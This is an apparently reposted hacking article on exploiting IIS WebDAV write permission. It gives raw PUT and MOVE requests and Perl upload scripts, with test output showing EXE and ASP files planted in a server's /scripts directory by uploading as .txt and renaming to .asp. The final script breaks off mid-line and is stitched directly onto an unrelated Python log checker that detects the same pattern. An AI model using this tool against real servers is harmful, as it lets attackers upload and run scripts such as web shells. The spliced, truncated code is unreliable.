Using IIS write permission (reposted)


Author: SuperHei Source: www.4ngel.net

Everyone has probably seen the article "Remote Analysis of IIS Settings", which analyzes the various settings of IIS. Here I will look at IIS write permission. The following is the part of that article that deals with write permission:

Write permission test. To test whether a directory gives web users write permission, use the following method. Telnet to the server's web port (80) and send this request:

    PUT /DIR/MY_FILE.TXT HTTP/1.1
    Host: iis-server
    Content-Length: 10

At this point the server returns a 100 (Continue) response:

    HTTP/1.1 100 Continue
    Server: Microsoft-IIS/5.0
    Date: Thu, 28 Feb 2002 15:56:00 GMT

Next we type 10 letters: aaaaaaaaaa. After this request is sent, look at the server's response. If it is a 201 Created response:

    HTTP/1.1 201 Created
    Server: Microsoft-IIS/5.0
    Date: Thu, 28 Feb 2002 15:56:08 GMT
    Location: http://iis-server/dir/my_file.txt
    Content-Length: 0
    Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK

then write permission on this directory is enabled. If it returns a 403 error, write permission is not enabled. If authentication is required and a 401 (Unauthorized) response comes back, write permission is enabled but anonymous users are not allowed. If a directory has both "Write" and "Scripts and Executables" enabled, a web user can upload a program and run it. Scary, %^#$!~

A brief explanation of the request:

    PUT /DIR/MY_FILE.TXT HTTP/1.1
    Host: iis-server
    Content-Length: 10

PUT: asks the server to store the enclosed entity under the supplied request URL. If the request URL refers to a resource that already exists, the enclosed entity should be treated as a modified version of the one residing on the origin server. If the request URL does not point to an existing resource, and that URL can be defined as a new resource by the requesting user agent, the origin server creates the resource with that URL.

Host: the address the HTTP request is sent to. Content-Length: the length of the content; its value must equal the size of the file being uploaded. Here we write a simple Perl program to do this tedious submission by hand; in the code we open the file with binmode(). The code is as follows:

    #!/usr/bin/perl
    use IO::Socket;

    $argc = @ARGV;
    if ($argc != 4) {
        print "USAGE: $0 127.0.0.1 80 kaka.exe /scripts/file.exe\n";
        exit;
    }
    $host = $ARGV[0];
    $port = $ARGV[1];
    $file = $ARGV[2];
    $path = $ARGV[3];

    @s = stat("$file");
    $size = $s[7];                         # get the file size
    print "$file size is $size bytes\n";

    my $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $host, PeerPort => $port)
        || die "Sorry! Could not connect to $host\n";
    print $sock "PUT $path HTTP/1.1\n";
    print $sock "Host: $host\n";
    print $sock "Content-Length: $size\n\n";   # request headers sent over the socket

    open(FILE, "$file") || die "Can't open $file";
    binmode(FILE);                         # open the file in binary mode
    while (read(FILE, $char, 1024)) {      # read the file data and upload it
        print $sock "$char";
    }
    print $sock "\n\n";

    @req = <$sock>;
    print "please wait...\n";
    sleep(2);
    if ($req[4] =~ /200|201/) {            # line 5 of the reply is the final status line
        print "Upfile succeed!!!";         # show success
    } else {
        print "Upfile faile!!!\n\n";
        print @req;                        # on failure, show the returned error
    }
    close $sock;
    close FILE;

Now we test it:

    c:\usr\bin> perl.exe iiswt.pl 127.0.0.1 80 kaka.txt /scripts/kaka.txt
    kaka.txt size is 14 bytes
    please wait...
    Upfile succeed!!!

    C:\inetpub\scripts> dir kaka.txt
    Volume in drive C has no label.

    Volume Serial Number is 3CD1-479E

    Directory of C:\inetpub\scripts

    2004-05-05  00:37              14 kaka.txt
                   1 File(s)             14 bytes
                   0 Dir(s)  3,871,080,448 bytes free

Here we have successfully uploaded kaka.txt into the web directory scripts. Since the program opens the file with binmode() (binary mode), other kinds of files should upload as well. Let's test an exe file:

    c:\usr\bin> perl.exe iiswt.pl 127.0.0.1 80 perl.exe /scripts/perl.exe
    perl.exe size is 20535 bytes
    please wait...
    Upfile succeed!!!

    C:\inetpub\scripts> dir perl.exe
    Volume in drive C has no label.
    Volume Serial Number is 3CD1-479E

    Directory of C:\inetpub\scripts

    2004-05-05  00:42          20,535 perl.exe
                   1 File(s)         20,535 bytes
                   0 Dir(s)  3,871,031,296 bytes free

Success: an EXE can be uploaded. So can any file be uploaded? Let's test an ASP file:

    c:\usr\bin> perl.exe iiswt.pl 127.0.0.1 80 kaka.asp /scripts/kaka.asp
    kaka.asp size is 4 bytes
    please wait...
    Upfile faile!!!
    HTTP/1.1 100 Continue
    Server: Microsoft-IIS/5.0
    Date: Tue, 04 May 2004 16:45:51 GMT

    HTTP/1.1 403 Forbidden
    Server: Microsoft-IIS/5.0
    Date: Tue, 04 May 2004 16:45:51 GMT
    Connection: close
    Content-Type: text/html
    Content-Length: 44

HTTP/1.1 403 Forbidden: failed!! The 403 Forbidden error shows that an ASP file cannot be written directly with PUT; testing the other file types IIS can execute gives the same HTTP/1.1 403 Forbidden error. So how do we upload a file type that IIS executes? Besides PUT, POST and GET, IIS accepts other commands, heh. We can first upload the local ASP file under another extension, such as TXT, into the remote host's web directory, and then rename it to ASP. We use nc to submit the test:

    D:\> nc 127.0.0.1 80
    MOVE /scripts/kaka.txt HTTP/1.1
    Host: 127.0.0.1
    Destination: http://127.0.0.1/scripts/kaka.asp

    HTTP/1.1 201 Created
    Server: Microsoft-IIS/5.0
    Date: Sun, 05 Oct 2003 09:30:59 GMT
    Location: http://127.0.0.1/scripts/x.asp
    Content-Type: text/xml
    Content-Length: 0

MOVE /scripts/kaka.txt successfully renamed the file to /scripts/kaka.asp. So by combining PUT and MOVE we can write a file to IIS easily :). Again we use Perl to do it.

Test of writing an ASP file, successful:

    C:\usr\bin> perl kaka.pl 127.0.0.1 80 kaka.asp /scripts/kaka.asp
    ************************************************************
    CODZ BY ≯superhei && LANKER
    ************************************************************
    kaka.asp size is 4 bytes
    please wait...
    Upfile succeed!!!
    MODIFYFILE SUCCEED!!!

The final iiswrite.pl code is as follows (when I wrote this article I was in an Internet cafe; the code in the article was my first "draft", and LANKER tested it and finished it, THX LANKER):

    #!/usr/bin/perl
    # the iiswrite script
    use IO::Socket;

    $argc = @ARGV;
    print "*" x 60;
    print "\nCODZ BY ≯superhei && LANKER\n";
    print "*" x 60, "\n";
    if ($argc != 4) {
        print "USAGE: $0 127.0.0.1 80 kaka.txt /scripts/my_file.txt\n";
        exit;
    }
    $host = $ARGV[0];
    $port = $ARGV[1];
    $path = $ARGV[3];
    $file = $ARGV[2];

    # split the target URL into directory and file name
    @path = split("/", $path);
    $any = pop(@path);
    $path1 = join("/", @path);

    @s = stat("$file");
    $size = $s[7];
    print "$file size is $size bytes\n";

    # step 1: PUT the local file into the target directory under a .txt name
    my $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $host, PeerPort => $port)
        || die "Sorry! Could not connect to $host\n";
    print $sock "PUT $path1/lanker.txt HTTP/1.1\n";
    print $sock "Host: $host\n";
    print $sock "Content-Length: $size\n\n";
    open(FILE, "$file") || die "Can't open $file";
    binmode(FILE);
    while (read(FILE, $char, 1024)) {
        print $sock "$char";
    }
    print $sock "\n\n";
    @req = <$sock>;
    print "please wait...\n";
    sleep(2);
    if ($req[4] =~ /200|201/) {
        print "Upfile succeed!!!\n";
    } else {
        print "Upfile faile!!!\n";
    }
    close $sock;
    close FILE;

    # step 2: MOVE the .txt file to the requested name
    my $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $host, PeerPort => $port)
        || die "Sorry! Could not connect to $host\n";
    print $sock "MOVE $path1/lanker.txt HTTP/1.1\n";
    print $sock "Host: $host\n";
    print $sock "Destination: http://$host:$port$path\n\n\n\n";
    @req = <$sock>;
    if ($re[0] =
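As an added example (not part of the original article), here is the same behaviour seen from the server side: a small Python checker that reads IIS W3C extended log lines, applies the article's reading of the 201/401/403 responses to WebDAV write methods, and flags the PUT-then-MOVE rename pattern on a single path. The field list and the log lines are constructed; a real log has more columns, and IIS does not record the MOVE Destination header.

```python
# Added example (not from the original article): flag WebDAV write activity in
# IIS W3C extended log lines. The field list and the log lines are constructed.
WRITE_METHODS = {"PUT", "MOVE", "COPY", "DELETE", "MKCOL", "PROPPATCH"}

def parse_w3c(text):
    """Yield one dict per log record, keyed by the names in the #Fields: line."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            yield dict(zip(fields, line.split()))

def classify(rec):
    """Apply the article's reading of the status code to a write attempt."""
    method, status = rec["cs-method"], int(rec["sc-status"])
    if method not in WRITE_METHODS:
        return None
    if 200 <= status < 300:
        return "write-succeeded"               # 201 Created: directory is writable
    if status == 401:
        return "write-enabled-auth-required"   # enabled, but anonymous users denied
    return "write-denied"                      # 403 Forbidden and everything else

def find_put_then_move(records):
    """Return (c-ip, uri) pairs where a successful PUT of a path was later followed
    by a successful MOVE of the same path from the same client (upload, then rename)."""
    puts, hits = set(), []
    for r in records:
        if classify(r) != "write-succeeded":
            continue
        key = (r["c-ip"], r["cs-uri-stem"].lower())
        if r["cs-method"] == "PUT":
            puts.add(key)
        elif r["cs-method"] == "MOVE" and key in puts:
            hits.append(key)
    return hits

SAMPLE_LOG = """#Software: Microsoft Internet Information Services 5.0
#Fields: date time c-ip cs-method cs-uri-stem sc-status
2004-05-05 00:37:10 10.0.0.5 PUT /scripts/kaka.txt 201
2004-05-05 00:37:12 10.0.0.5 GET /default.htm 200
2004-05-05 00:37:30 10.0.0.5 PUT /scripts/kaka.asp 403
2004-05-05 00:38:01 10.0.0.5 MOVE /scripts/kaka.txt 201
2004-05-05 00:39:00 10.0.0.9 PUT /upload/notes.txt 401
"""

if __name__ == "__main__":
    recs = list(parse_w3c(SAMPLE_LOG))
    print([(r["cs-uri-stem"], classify(r)) for r in recs if classify(r)])
    print("PUT-then-MOVE:", find_put_then_move(recs))
```

A MOVE hit on a path that was just created by PUT is worth a look at the directory itself, since the new name never reaches the log.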

Please credit the original source when reposting: https://www.9cbs.com/read-126502.html
